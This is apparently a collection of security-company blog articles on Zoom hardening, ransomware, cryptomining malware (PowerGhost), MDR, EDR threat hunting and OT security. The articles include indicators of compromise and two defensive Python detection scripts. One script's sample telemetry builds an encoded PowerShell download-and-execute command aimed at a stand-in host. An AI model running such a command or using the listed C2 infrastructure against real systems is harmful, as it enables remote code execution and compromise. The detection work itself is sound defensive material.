Recommendations for Secure Zoom Sessions

Many organizations and professionals have growing security concerns about using Zoom as a conferencing platform, but switching platforms is hard because of prior investment, user familiarity and established practices. ETEK Security Advisory experts offer the following 7 key technical and Zoom tool management recommendations for using Zoom securely:

  1. Updates: Every platform keeps adding operating and security features, and Zoom is no exception. Before hosting a meeting, open the Zoom client, click your profile picture and choose Check for Updates; install the update on every device that will join the session.
  2. Passcodes and meeting IDs: Zoom assigns each account a Personal Meeting ID (PMI), a fixed number that anyone who has it can reuse to join your future meetings. Do not use the PMI for meetings with people outside your trust network; generate a random, one-time meeting ID for each meeting and set a passcode for each meeting as well.
  3. Administrator or moderator control: Assign a moderator (host or co-host) to every meeting where participants beyond your trust network will join. Make registration mandatory so the moderator can review who is trying to enter and remove anyone who is unknown, disruptive or a potential threat.
  4. Leverage the waiting room: Enable the waiting room so that the moderator validates each invitee before admitting them to the session.
  5. Screen sharing control: Restrict screen sharing to the host. In the Zoom web settings go to Personal > Settings > In Meeting (Basic), find Screen sharing and set who can share to Host Only.
  6. Lock the session: Lock the meeting once all expected participants have joined, so nobody else can enter even with the meeting ID and passcode. You can also disable participant video if required.
  7. File-sharing control: Disable in-meeting file transfer (animated GIFs, files sent through chat and general file sharing) when you are hosting. This setting is not the default; see https://support.zoom.us/hc/en-us/articles/209605493-In-Meeting-File-Transfer?zcid=1231 (Spanish: https://support.zoom.us/hc/es/articles/209605493-Transferencia-de-archivos-durante-la-reuni%C3%B3n)

Important Note:

Trojanized installers are circulating: cybercriminals distribute software that looks like the genuine Zoom client but carries malware, and such downloads can be the entry point for targeted (APT) campaigns. Download Zoom only from the official website or from the App Store or Google Play, and configure devices to install software only from official, trusted sources.

By: Iván Camilo Castellanos

RANSOMWARE Attacks Can be Managed

What is Ransomware?

Ransomware is malicious software (malware) that infects machines and blocks access to files, boot sectors, whole devices or any other critical resource, usually by encrypting it, and then demands a ransom to restore access.

What causes ransomware attacks?

  • Browsing: visiting malicious sites and installing the plugins they offer.
  • Phishing: e-mails with links that imitate trusted sites and trick users into compromising their own security.
  • External drives: plugging infected removable drives into your machines.
  • Downloading malicious content: music, "free" software or .exe files from untrusted sites.
  • Social engineering: techniques that convince the user that the attacker is a trusted provider and get them to carry out the malicious action.
  • P2P connections: using peer-to-peer networks to download music or free software.

How to proactively prevent ransomware attacks?

  1. Backups: Maintain a strict backup policy, with offline or otherwise isolated copies and tested restores, so that if you are hit you can recover without paying.
  2. Awareness: Educate users to
    • Always verify the legitimacy of the sites they browse.
    • Never download software from untrusted P2P networks.
    • Not open links or attachments in e-mails from unknown senders.
    • On mobile devices, allow installation only from official app stores.
    • Run simulated phishing campaigns to measure how prepared end users actually are.
  3. EDR: Move to next-generation antivirus (NGAV) and Endpoint Detection and Response (EDR) with proactive protection.
  4. Centralized teleworker policy deployment: Ensure teleworkers receive the right web, application and data governance policies centrally, not device by device.
  5. Threat assessment: Continuously validate vulnerabilities on endpoints.

If you need more help, please reach out to the ETEK advisory team. We can assess the gaps, provide solutions to fix the issues and run proactive simulated attacks to test the resilience of your architecture. Contact: ecoadvisory@etek.com.co

By: Iván Camilo Castellanos, Praveen Sengar

COVID 19 – SURVIVAL OF THE AGILIST

“It is not the strongest who will survive, but those who can best manage change.” This quote resonated with me when the COVID-19 crisis hit. We were clear that to survive we needed to adapt, innovate and think outside the box.

In the last 4 weeks we executed on multiple fronts, and we are sharing some experiences that may help other privileged people like us who can operate remotely.

Clients: Living by one of our values, Client Centricity, we focused on our clients' core needs by creating a COVID-19 response portfolio: Connectivity, Productivity, End User Protection, Incident Response and End User Awareness.

ETEK's team responded quickly to our clients' urgent remote working needs and deployed VPN solutions for 40+ clients. For clients with infrastructure constraints, we provided a cloud-based, zero-trust #Netfoundry #SASE solution. We ran 5+ POCs and enabled 2,000 users to work from home across 2 large conglomerates in 3 days. The cross-functional task force scaled to meet clients' urgent requests.

As the number of incidents and threats increased, it was important to help clients. Our Advisory team helped clients make informed decisions quickly, leveraging ETEK Security Labs. ETEK organized 7 webinars for clients on Connectivity, Productivity, End User Protection, Incident Response and End User Awareness, reaching 200+ clients in 4 weeks. ETEK continues to expand its "as a service" offerings, launching WAF, IAM as a service and cloud migration services by May 2020.

ETEK issued essential service passes to all onsite engineers to attend to any client emergency, while they are working remotely. 

Employees: Once we saw the number of COVID-19 cases rising on March 13th, we decided to work from home, a week before the government mandated a complete lockdown. The strikes in Colombia had prepared us better for this eventuality.

The team experienced some issues in the first week, but most employees responded well. To my surprise the organization's productivity went up; the team was focused and effective. We organized multiple all-company meetings, connecting 240 employees across Colombia and Peru, to discuss the situation, address fears and explain how we were responding to the crisis.

HR team shifted gears launching new well-being programs such as Yoga and Meditation. Meanwhile, the focus continues to aggressively execute role-specific training and development programs in line with the organization’s new vision. 

Management Team: Initially it was hard for me not to have boundaries between family and work. The entire management team stretched to working 14-16 hour days. We realigned our portfolio and key verticals and addressed some client situations. Management decided not to terminate any employees and to take a voluntary pay cut. We also decided to implement work from home as a policy and restructured our office space, reducing our operating expenses.

Community: We all must stand together to fight this crisis. ETEK will donate 5% of the gross margin of connectivity and productivity solutions sold in Colombia to the Corona Foundation (Fundación Corona).

By: Praveen Sengar

Cryptomining and the impact on business environments in Latin America

Cryptomining malware has become the preferred way for cybercriminals to monetize their efforts quickly and effectively. Rising prices, the growing number of cryptocurrencies and the difficulty of detecting these programs have created ideal conditions for their appearance in markets such as Latin America.

Over the past few years threats have evolved at considerable, almost exponential, speed, and organizations have an equally wider scope to protect.

Strategies built on technologies that were once adequate have created a false sense of security. For example, when traditional endpoint protection tools generate a large number of reports saying that many malicious files have been identified and cleaned up, it suggests that one is fully protected, and that undermines the case for improving the cybersecurity posture.

Unfortunately, unless some malicious code produces a visible impact on the organization, it is almost impossible to make the case for improving or evolving the existing security controls.

The need for tools such as firewalls, antivirus (anti-malware), WAF, IPS and others is in no way disputed; they are layers of a defense-in-depth model. However, threats that evade those basic controls by one technique or another (obfuscation, fileless execution, logic bombs, packing or wrapping, among others) also require special attention, all the more so if they sit silently on the network, perhaps taking control of one or several computers, modifying files, extracting information, mining cryptocurrency or, in the worst case, intercepting communications.

One of the new trends in improving cybersecurity posture, and one designed precisely to deal with threats that keep evolving, is threat hunting.

Threat hunting can be defined as the continuous, iterative search within the network for advanced threats that existing controls have not detected, with the goal of detecting and isolating them; by its nature it is a proactive analysis.

This proactive approach closes the large gap left by tools that are mostly reactive and are usually brought to bear only after the attack or incident has already happened.

A security incident illustrates the difference. From a reactive perspective, the incident starts from an event that already produced an impact on the organization; the security tools then let us understand what happened, and detection and control are fine-tuned afterwards by creating new rules, enabling a new feature or simply downloading an updated signature package. From the proactive, threat hunting perspective, the incident starts from the continuous collection and analysis of the network's normal activity and its deviations. Access to system files, ports being opened, PowerShell execution, folder reads, registry key modifications or plain connectivity to certain sites may all be new indicators of compromise, so they must be handled through an intensive security telemetry process that profiles, as accurately as possible, the company's devices, users, networks and traffic.

There has been ongoing discussion in the cybersecurity world about "cryptomining" and its impact on corporate environments. To understand it, we first need to define cryptocurrency:

“A cryptocurrency is a type of digital currency based on cryptography. It uses cryptographic techniques to generate units and verify transactions, in place of a central authority.”

In proof-of-work currencies, new units are issued to whoever first solves deliberately expensive computations, so "mining" consumes a great deal of computing power. This is why everyone from home users to corporations has been hit by the wave of cryptomining networks, with corporations as the main target because of the high computational capacity they maintain to deliver their services (e.g. transactional portals, ERPs, CRMs, among others). Mining can be summarized as follows:

  • The first step in cryptomining is to join a network built on a blockchain. One can join willingly, by deliberately downloading mining software, or unwillingly, through malware delivered by an attacker by different means (e-mail, USB, images, among others). https://www.welivesecurity.com/la-es/2017/07/28/claves-potencia-del-bitcoin/
  • Once inside a mining network, each member's role is to execute complex mathematical operations that require considerable computing power. In exchange for that contribution, and depending on the success of its validations, each member receives a share of the cryptocurrency. Imagine that for lending our laptop to perform these operations we were paid 100 dollars a day (assuming a high success rate in the computations).
  • To store the earnings, a wallet is needed, in which the shares of cryptocurrency resulting from successful computations are collected.

To understand how widespread these campaigns are, it is important to be aware of the growth in the value of cryptocurrencies at the end of 2017.

This skyrocketing price was a wake-up call for cybercriminals, showing that there was money to be made, and it changed the modus operandi of many of them.

The impact of cryptomining may not be as well publicized in the media as the different ransomware families (most notably WannaCry); however, in terms of technological operation for companies, this type of malware (cryptominers) can have an impact equal to or greater than ransomware.

Understanding how a mining network works makes it easy to see why attackers want to run mining campaigns in business environments. The devices that deliver services to users and clients handle large amounts of data and therefore need robust, high-performance systems, which considerably raise the probability of obtaining cryptocurrency. Those resources can be abused by external parties with malicious intent or by internal staff with administrative privileges on the devices, so mitigation must also cover the internal vector, misuse by the administrators in charge of these devices, an angle that organizations sometimes do not supervise.

New malware markets: from information “hijacking” to crypto-mining campaigns

Ironically, being hit by ransomware provided certainty: "the system has been compromised". With cryptomining that certainty is hard to obtain, because the attacker is much quieter. The infection method can be similar to that of any other malware (e.g. WannaCry), where the initial foothold comes from a "dropper"[1] that runs the payload undetected on the target system and may even elevate privileges to read and write information. In many cases the same vulnerability exploited to spread ransomware can be used to spread cryptominers (EternalBlue).

Clearly the motivation for abusing technological resources is not trivial, and that means a wide range of threats will keep growing. The malware market has evolved from "hijacking" information to generating revenue through cryptomining.

What are the trends in the region regarding cryptomining?

The region's main problem is, ironically, not technological but cultural. People tend to think that incidents of this kind have no local impact and only concern countries like the United States, Russia or China. Recent events have revealed attacks of this kind in Latin American corporate environments, particularly in Brazil, Colombia, Mexico, Peru and Ecuador. The most recent one is called PowerGhost.

PowerGhost is a Trojan that, once it gains a foothold, can load further malicious components onto the target system.

According to research by several security vendors, confirmed by ETEK International's cyberlab, this malware combines PowerShell with propagation via EternalBlue (the same exploit used on many occasions to spread ransomware).

The analysis established that this code can hide behind apparently legitimate software and evade security controls. Other patterns identified are:

  • Anomalous behaviour, including opening unexpected ports.
  • Use of post-exploitation tools such as Mimikatz to elevate privileges and look for further propagation vectors (compromising user credentials and information along the way).
  • Use of evasion, anti-debugging and anti-sandboxing techniques.
  • Other indicators of compromise are listed in the appendix of this article.

The main recommendations to be taken into consideration to mitigate or deal with these types of events are:

  • Apply the security updates released by the different vendors on a regular basis. It sounds redundant, but it is the first preventive measure. These attacks keep exploiting vulnerabilities that massively affected large companies in the past and are still present in many environments (EternalBlue, MS17-010), and an unpatched, exposed system makes the company a target.
  • Prevent users from reaching sites with a low reputation score, and sites that prompt the installation of some kind of browser add-on.
  • Keep IPS and anti-malware signatures updated, with regular update campaigns.
  • Deploy security intelligence models with event correlation. They can be implemented with different technologies or contracted as a managed security service from a Security Intelligence Center.
  • Model network traffic and identify behavioral baselines so that anomalies can be flagged.
  • Monitor the actions executed on critical devices by administrators and other privileged users.
  • Periodically evaluate new protection services to prevent, detect and contain this type of threat. Always check with your strategic information security partner for new market trends; this will give you the best security guidelines for your business.

Appendix

Indicators of compromise.

C&C hostnames and addresses:

  • update.7h4uk[.]com
  • info.7h4uk[.]com
  • 185.128.43.62

Malware MD5:

  • AEEB46A88C9A37FA54CA2B64AE17F248: https://threatexplorer.bluecoat.com/v2/tex#/file?q=AEEB46A88C9A37FA54CA2B64AE17F248
  • 4FE2DE6FBB278E56C23E90432F21F6C8: https://www.virustotal.com/#/file/f90bcf5b649ebb61d1b2a1a973c04312e3e72a71d4393ccbb12b9fa593637d62/detection
  • 71404815F6A0171A29DE46846E78A079: https://www.virustotal.com/#/file/a467974c13cbee341c08fd0a51c28bf7cc7e482ff078a9d0ed96371b2ced5d95/detection
  • 81E214A4120A4017809F5E7713B7EAC8: https://www.virustotal.com/#/file/e5d45d5dd213704a6f4a50db85717a6901cfe968eaa6cf9742480cf6c99ee51d/detection

Related containment signatures:

  • HTTP: Microsoft Win32k Elevation of Privilege Vulnerability (CVE-2018-8120).
  • NETBIOS-SS: Windows SMB Remote Code Execution Vulnerability (CVE-2017-0144).
  • Do not forget all signatures related to MS17-010.
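The following script, added here as an example and not part of the original article or of any vendor tool, sweeps a web proxy log and a file-hash inventory for the indicators listed above. The log format, timestamps, client addresses, URL paths, host names and file paths in the sample data are constructed for the demonstration; only the hostnames, the IP address and the MD5 values come from the appendix.

```python
import hashlib
import re
from urllib.parse import urlsplit

# Indicators from the appendix. Hostnames stay defanged in the source and are
# refanged at load time, so the list can be copied around without live links.
IOC_HOSTS_DEFANGED = ("update.7h4uk[.]com", "info.7h4uk[.]com")
IOC_IPS = frozenset({"185.128.43.62"})
IOC_MD5 = frozenset({
    "aeeb46a88c9a37fa54ca2b64ae17f248",
    "4fe2de6fbb278e56c23e90432f21f6c8",
    "71404815f6a0171a29de46846e78a079",
    "81e214a4120a4017809f5e7713b7eac8",
})


def refang(indicator):
    """Turn 'a[.]b' back into 'a.b', lower-cased for comparison."""
    return indicator.replace("[.]", ".").lower()


IOC_HOSTS = frozenset(refang(h) for h in IOC_HOSTS_DEFANGED)

# Assumed proxy log format (constructed for this example), one request per line:
#   <ISO timestamp> <client IP> <method> <URL> <status>
PROXY_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\d{1,3}(?:\.\d{1,3}){3})\s+[A-Z]+\s+(?P<url>\S+)\s+\d{3}$"
)


def sweep_proxy_log(log_text):
    """One hit per request whose destination host or IP is in the IoC lists."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = PROXY_LINE.match(line.strip())
        if not m:
            continue  # malformed line: skip it rather than abort the sweep
        host = (urlsplit(m["url"]).hostname or "").lower()
        if host in IOC_HOSTS or host in IOC_IPS:
            hits.append({"line": lineno, "ts": m["ts"], "client": m["client"], "indicator": host})
    return hits


def sweep_hash_inventory(inventory):
    """inventory rows are (host, path, md5) as exported from an EDR or AV console."""
    return [{"host": h, "path": p, "md5": d.lower()} for h, p, d in inventory if d.lower() in IOC_MD5]


def md5_of(data):
    """MD5 of a file you already hold, in the form used by the appendix."""
    return hashlib.md5(data).hexdigest()


# Constructed sample data: timestamps, client addresses, URL paths, host names and
# file paths are made up; only the indicators come from the appendix.
SAMPLE_PROXY_LOG = """\
2018-07-25T10:01:02Z 10.0.0.15 GET http://update.7h4uk.com/check 200
2018-07-25T10:01:05Z 10.0.0.15 GET http://185.128.43.62/payload 200
2018-07-25T10:02:10Z 10.0.0.22 GET https://www.example.com/index.html 200
2018-07-25T10:03:33Z 10.0.0.31 GET http://INFO.7h4uk.com:80/report 200
this line is malformed and must be skipped
"""
SAMPLE_INVENTORY = [
    ("ws-0015", r"C:\Windows\Temp\svc.exe", "AEEB46A88C9A37FA54CA2B64AE17F248"),
    ("ws-0022", r"C:\Program Files\App\app.exe", "d41d8cd98f00b204e9800998ecf8427e"),
]

if __name__ == "__main__":
    for hit in sweep_proxy_log(SAMPLE_PROXY_LOG):
        print(f"C2 contact: {hit['client']} -> {hit['indicator']} (line {hit['line']})")
    for hit in sweep_hash_inventory(SAMPLE_INVENTORY):
        print(f"Known sample: {hit['host']} {hit['path']} md5={hit['md5']}")
```

Two caveats a hunter should keep in mind: the IP address and hostnames can be reassigned or sinkholed over time, so a hit is a lead to investigate rather than a verdict; and because PowerGhost runs mostly as an obfuscated PowerShell script, the file hashes only catch components that touch disk, so hash sweeps should be paired with the behavioural hunting the article describes.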

References

Mining is the new black – https://securelist.com/mining-is-the-new-black/84232/

A mining multitool – https://securelist.com/a-mining-multitool/86950/

Fileless Malware PowerGhost Targets Corporate Systems – https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/fileless-malware-powerghost-targets-corporate-systems

PowerGhost: nuevo minero de criptomonedas apunta a redes corporativas de América Latina – https://latam.kaspersky.com/blog/powerghost-nuevo-minero-de-criptomonedas-apunta-a-redes-corporativas-de-america-latina/13206/

5 claves para entender la potencia del bitcoin – https://www.welivesecurity.com/la-es/2017/07/28/claves-potencia-del-bitcoin/

MDR Service Definitions

What is MDR?

The purpose of MDR services is to quickly identify and reduce the impact of security incidents on customers. These services focus on 24/7 monitoring, detection and targeted threat response. At ETEK we use a combination of host- and network-layer technologies together with advanced analysis, threat intelligence, forensic data and human expertise for investigation, threat research and response to detected threats.

MDR services

  • Monitoring and threat detection: Dedicated monitoring to look for traces of security threats.
  • Incident response: Initial automated response capabilities supported by playbooks.
  • Threat Hunting: Continuous search for cyber threats that are not detected by traditional security controls.

Incident Management

  • Event: Observable occurrence in a system or network, for example:
    • A user connecting to a shared resource
    • A user sending an e-mail message
    • A firewall blocking a connection attempt
  • Incident: Actual or imminent violation of an organization's information security policies, for example:
    • Users tricked into opening a "legitimate" report that infects them with a malicious program (malware)
    • Workstations connecting to addresses recognized as command and control (C&C) servers
    • Unavailability of services due to malware attacks

Use Cases and Playbooks

  • Use case: A defined detection scenario (the data sources to collect, the condition that should raise an alert and the expected response) that improves the way companies detect threats, respond to incidents and monitor their IT assets continuously.
  • Playbook: A checklist of the steps and actions needed to respond successfully to a specific incident type or threat. Incident response playbooks provide a simple, step-by-step, top-to-bottom orchestration approach; they formalize incident response processes and procedures within investigations and ensure the steps are followed systematically.

Risks that are mitigated with MDR services

  • Loss of, or lack of access to, data required for the operation
  • Leakage of data that is stored and shared widely, which can disrupt business operations
  • Loss of data confidentiality and subsequent disclosure that may benefit competitors
  • Loss of customers due to theft and unauthorized disclosure
  • Rework that affects the organization's productivity
  • Unauthorized modification of file contents
  • Loss of data availability due to exposed configuration information and open ports
  • Cyber attacks against addresses and ports identified by attacker reconnaissance
  • Financial loss from losing customers or from lawsuits
  • Failures in access to information required for business operations

Teams featured in MDR

  • Red Team: Emulates attacks on the enterprise security posture to measure the effectiveness of its security controls.
    • Functions
      • The Red Team performs a process of emulating threat scenarios that an organization may face.
      • It generates indicators of compromise for new attacks.
      • Use case testing.
      • Supports the Blue Team in developing customized scenarios for client demos.
    • Services
      • Ethical hacking
      • Vulnerability analysis
      • Cybersecurity compliance
      • Social Engineering
      • Exploiting fraud vectors.
      • Malware scenarios
  • Blue Team: Responsible for executing computer network defense activities in a company’s information system.
    • Functions
      • The main objective of the Blue Team is to perform assessments of the diverse threats that can affect organizations.
      • Monitor security activities (network, systems, etc.)
      • Suggest action plans to mitigate risks.
      • Incident response.
      • Forensic analysis
      • Establishing detection measures for future cases
    • Services
      • Event Correlation
      • Incident response.
      • Configuration of use cases and Playbooks.
      • Availability Monitoring
      • SIEM rules tune-up.
  • Purple Team: They work to ensure and maximize the effectiveness of the Red and Blue teams. They do this by integrating Blue Team’s defensive tactics and controls with the threats and vulnerabilities identified by the Red Team
    • Functions
      • The main purpose of a Purple Team is to manage the security of the organization’s assets
      • Perform tests to check the effectiveness of security mechanisms and procedures
      • Define/develop additional security controls to reduce the risk of the organization.
      • Playing the role of facilitator between both teams, Red & Blue
    • Services
      • Enables improvements in detection and defence
      • Defines Use Cases.
      • Defines Playbooks.
      • Create strategies based on customer needs.

Overview of MDR service components

  • Proactive Support
    • Proactive monitoring
    • Knowledge of the customer's service architecture and CMDB
    • Use cases knowledge base up-to-date
    • Continuous CyberWar Exercises
  • Managed Services
    • Device management leveraged by proactive detection and automation capabilities
    • Threat hunting
    • Incident response based on best practices
    • Staff with multiple skills and certifications

Next generation endpoint protection EDR (Endpoint Detection and Response)

Cyberthreats have grown not only in number but in complexity. Hacking campaigns that a few years ago aimed to exploit well-known, already-documented code have become structured, chameleon-like processes capable of studying a network and its vulnerabilities before exploiting them. Endpoint solutions (for servers, PCs, tablets, mobile devices, among others) based on recognizing malicious code that is already known therefore had to evolve.

A new suite of tools designed to defend the endpoint against these increasingly specialized threats has become essential to any company's cyberdefense strategy. These solutions are known as EDR (Endpoint Detection and Response) and have become one of the most important defensive trends in the cybersecurity market, replacing the reactive view of security incidents with a proactive approach focused on the secure operation of the company. This proactive concept is known as threat hunting, a growing trend in the industry that can be applied at many layers: endpoint, network, application, among others.

In recent years threats have evolved at considerable, almost exponential, speed, and to the same extent organizations have amplified their exposure. Digital transformation, e-commerce, connectivity trends and similar needs add up to an increasingly broad and complex technological surface to protect.

Strategies built on technologies that were once adequate have created a false perception of security. For example, when traditional endpoint protection tools generate a large number of reports indicating that many malicious files have been identified and cleaned up, it suggests that the user is completely protected and undermines the case for improving the cybersecurity posture.

Unfortunately, unless some malicious code or "virus" produces a visible impact on the organization, it is almost impossible to make the case for improving or evolving the existing security controls.

This in no way diminishes the need for tools such as firewalls, antivirus (anti-malware), WAF, IPS and others. They are layers of the defense-in-depth model every company should have today. However, threats that evade those basic controls by one technique or another (obfuscation, fileless execution, logic bombs, packing or wrapping, among others) also require special attention, all the more so if they sit silently on the network, perhaps taking control of one or more computers or servers, modifying files, extracting information, mining cryptocurrency or, in the worst case, intercepting communications.

One of the new trends in improving cybersecurity posture, and one that is quite successful against threats that keep evolving, is threat hunting.

But what is threat hunting?

Threat hunting can be defined as the continuous, iterative search within the network for advanced threats that existing controls have not detected, with the goal of detecting and isolating them; by its nature it is a proactive analysis.

This proactive approach closes the large gap left by tools that are mostly reactive and are usually brought to bear only after the attack or incident has already happened.

A security incident illustrates the difference. From a reactive perspective, the incident starts from an event that already produced an impact on the organization; the security tools then let us understand what happened, and detection and control are fine-tuned afterwards by creating new rules, enabling a new feature or simply downloading an updated signature package. From the proactive, threat hunting perspective, the incident starts from the continuous collection and analysis of the network's normal activity and its deviations. Access to system files, ports being opened, PowerShell execution, folder reads, registry key modifications or plain connectivity to certain sites may all be new indicators of compromise, so they must be handled through an intensive security telemetry process that profiles, as accurately as possible, the company's devices, users, networks and traffic.

[Illustration 1: graphic comparison of Threat Detection and Threat Hunting]

It is precisely on the hypotheses and on the analysis of the "data" shown in Illustration 1, obtained from the endpoint, that EDR tools succeed.

EDR strategies rely on tools of this kind to monitor the endpoint and its associated network traffic and feed that input into a data store very different from that of a traditional antivirus. There, the security telemetry processes run, supported by analysis of the organization's real data rather than signatures or generic patterns.

The analysis these tools provide gives not only a realistic view of the endpoint's security state but also an improvement in posture, by diverting or containing attacks on the basis of early identification of internal and external threats.

Technically speaking, a workstation that launches an anomalous process, changes a registry key that had never been touched before, opens high ports for incoming connections, or shows a system process that has grown considerably in size because something has been wrapped into it, will be flagged by the EDR's advanced analysis as a target for investigation and rapid response. Traditional endpoint protection does not cover this, because of its signature-validation and/or heuristic nature. The point is not to detract from antivirus tools but to complement the protection and response effort on the endpoint; that is what an EDR is for.
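The baseline-and-deviation logic described in the threat hunting definition above and in the previous paragraph, written out as an added example (not code from the article or from any EDR product). The telemetry line format, host names, command lines, registry keys and ports are assumptions constructed for the demonstration; the logic is what the text describes: learn what each host normally does during a learning window, then flag processes, parent-child relationships, registry keys and listening ports that were never seen before, plus PowerShell launched with an encoded command.

```python
import base64
import re
from collections import defaultdict

# Assumed telemetry line format for this example (not a real EDR schema):
#   host|event|subject|parent|cmdline
#   process  : subject = image name, parent = parent image, cmdline = command line
#   registry : subject = registry key written (parent and cmdline empty)
#   listen   : subject = TCP port the host started listening on
ENCODED_PS = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
PERSISTENCE_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce", "\\services\\")


def parse_telemetry(text):
    """Return (host, event, subject, parent, cmdline) tuples; skip blank, comment or malformed lines."""
    events = []
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw or raw.startswith("#"):
            continue
        parts = raw.split("|")
        if len(parts) != 5:
            continue
        host, event, subject, parent, cmdline = parts
        events.append((host.lower(), event.lower(), subject.lower(), parent.lower(), cmdline))
    return events


def build_baseline(events):
    """Per-host sets of everything observed during the learning window."""
    base = defaultdict(lambda: {"process": set(), "lineage": set(), "registry": set(), "listen": set()})
    for host, event, subject, parent, _ in events:
        if event == "process":
            base[host]["process"].add(subject)
            base[host]["lineage"].add((parent, subject))
        elif event in ("registry", "listen"):
            base[host][event].add(subject)
    return dict(base)


def decode_encoded_ps(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_PS.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(baseline, events):
    """Score each observation-window event against its host's baseline."""
    findings, unbaselined = [], set()

    def add(host, severity, detail):
        findings.append({"host": host, "severity": severity, "detail": detail})

    for host, event, subject, parent, cmdline in events:
        if host not in baseline:  # no learning data for this host: say so once, do not guess
            if host not in unbaselined:
                unbaselined.add(host)
                add(host, "info", "no baseline for host; events not scored")
            continue
        b = baseline[host]
        if event == "process":
            if subject not in b["process"]:
                add(host, "high", f"never-seen process {subject} spawned by {parent}")
            elif (parent, subject) not in b["lineage"]:
                add(host, "high", f"known process {subject} with unseen parent {parent}")
            if subject in ("powershell.exe", "pwsh.exe"):
                decoded = decode_encoded_ps(cmdline)
                if decoded is not None:
                    add(host, "critical", f"powershell encoded command: {decoded[:80]}")
        elif event == "registry" and subject not in b["registry"]:
            severity = "high" if any(k in subject for k in PERSISTENCE_KEYS) else "medium"
            add(host, severity, f"first write to registry key {subject}")
        elif event == "listen" and subject not in b["listen"]:
            severity = "high" if subject.isdigit() and int(subject) > 1024 else "medium"
            add(host, severity, f"new listening port {subject}")
    return findings


# Constructed sample telemetry: hosts, paths, keys and command lines are made up.
ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')".encode("utf-16-le")
).decode()
BASELINE_WINDOW = """\
ws-0015|process|explorer.exe|userinit.exe|C:\\Windows\\explorer.exe
ws-0015|process|winword.exe|explorer.exe|"C:\\Program Files\\Office\\WINWORD.EXE"
ws-0015|process|powershell.exe|explorer.exe|powershell.exe -File C:\\Scripts\\inventory.ps1
ws-0015|registry|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon||
ws-0015|listen|3389||
srv-0003|process|sqlservr.exe|services.exe|"C:\\Program Files\\MSSQL\\sqlservr.exe"
srv-0003|listen|1433||
"""
OBSERVATION_WINDOW = f"""\
ws-0015|process|powershell.exe|winword.exe|powershell.exe -nop -w hidden -enc {ENC}
ws-0015|process|updater.exe|powershell.exe|C:\\Users\\Public\\updater.exe
ws-0015|registry|HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run||
ws-0015|listen|3389||
srv-0003|listen|4444||
srv-0003|process|sqlservr.exe|services.exe|"C:\\Program Files\\MSSQL\\sqlservr.exe"
ws-0099|process|explorer.exe|userinit.exe|C:\\Windows\\explorer.exe
"""

if __name__ == "__main__":
    base = build_baseline(parse_telemetry(BASELINE_WINDOW))
    for f in hunt(base, parse_telemetry(OBSERVATION_WINDOW)):
        print(f"[{f['severity']:>8}] {f['host']}: {f['detail']}")
```

Two things the sample shows that the paragraph does not: a host with no baseline is reported once and left unscored rather than flooding the queue (everything it does is "new"), and a process that is itself normal (powershell.exe) is still flagged when its parent (winword.exe) was never seen launching it. The usual caveat applies: if the compromise predates the learning window, the attacker's activity becomes part of "normal", so baselines should be learned from data that has been checked against known indicators first.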

It is important to understand that an EDR strategy is not based only on what the tool can deliver; it is also important to consider the research sources that support those tools and that in turn generate new indicators of compromise. Therefore, during the immersion processes of the hunting strategy, it is recommended to accompany the acquisition of technologies with research groups that have the skills to read, research and feed the indicators of compromise specific to each organization.


Security in OT (Operational Technologies)

The speed at which technology advances runs in parallel with the appearance of new vulnerabilities and threats that can significantly compromise companies' infrastructure. Industrial and operational systems are not immune to these threats, so it is necessary to implement security programs that seek to mitigate cybersecurity risks in OT systems. This article gives a general overview of the characteristics of industrial systems and some security and monitoring recommendations for them.

Operational technologies (OT) encompass industrial control systems (ICS) such as SCADA networks made up of DCS (distributed control systems), RTUs (Remote Terminal Units) and PLCs (Programmable Logic Controllers) to guarantee interconnectivity, control and monitoring of industrial devices such as valves, motors and actuators, among others, which are widely used in industries such as oil and gas, power generation and transmission, water treatment, chemical handling, etc.

Because operational technologies involve physical processes, any impact on their functioning and operation can adversely affect the surrounding environment, including the release of hazardous materials, explosions and permanent environmental damage, which can potentially harm the integrity of people near the process. For these reasons, it is necessary to invest in protecting OT through a security scheme that reduces the likelihood of cybersecurity-related risks materializing and avoids physical, economic and social impacts.

OT systems demand Availability, Integrity and Confidentiality (in that order of priority) as security premises, and as with IT networks it is necessary to create risk-management programs, emergency response and constant monitoring of the security posture.

The risk-management process should be carried out using the three-tiered approach shown in Figure 1: (i) organizational level, (ii) business or mission process level and (iii) systems level (IT and OT). These should provide the ability to identify, assess, respond to and monitor cybersecurity-related risks, and give organizations tools for risk-based decision-making. Examples of such risk-management processes for OT are NIST Special Publication 800-82 (Guide to Industrial Control Systems (ICS) Security), NIST SP 800-39 and the risk-management guideline for the electricity sector (Electricity Sector Cybersecurity Risk Management Process (RMP) Guideline).

ICS-CERT (Industrial Control Systems Cyber Emergency Response Team), together with various CERTs (Computer Emergency Response Teams), offers recommendations for handling incidents involving OT systems as well as threat-mitigation measures. It is important for companies that own OT systems to stay constantly up to date on the origins and impacts of new threats and vulnerabilities and to apply the advice issued by these entities.

Implementing security controls in OT systems is an arduous task because of the intrinsically distributed architecture of ICS systems. Figure 2 shows an example topology in which different equipment and technologies can be found at the remote sites, diverse forms of WAN or inter-site communication, and a control center commonly isolated geographically from the processes.

Security architectures for ICS should be defined taking into account:

  1. Network segmentation and segregation: Because of the nature of OT and IT network traffic, it is recommended to separate them and keep their contact to a minimum, to guarantee homogeneity and governance over each. If IT/OT connectivity is required, it should be kept minimal, filtered and inspected by firewalls that allow only the ports needed for specific communications, under the premise of least-privilege access.
  2. Perimeter protection: Transferring information between security domains with different policies is a risk, since such transfers may violate one or more domains. Protection controls must be implemented at the perimeters using firewalls, gateways, HIPS and NIPS, tunnels and others, under the following premises:
    • Deny all traffic by default and permit only by exception.
    • Deploy proxy-type intermediary devices for traffic to external domains.
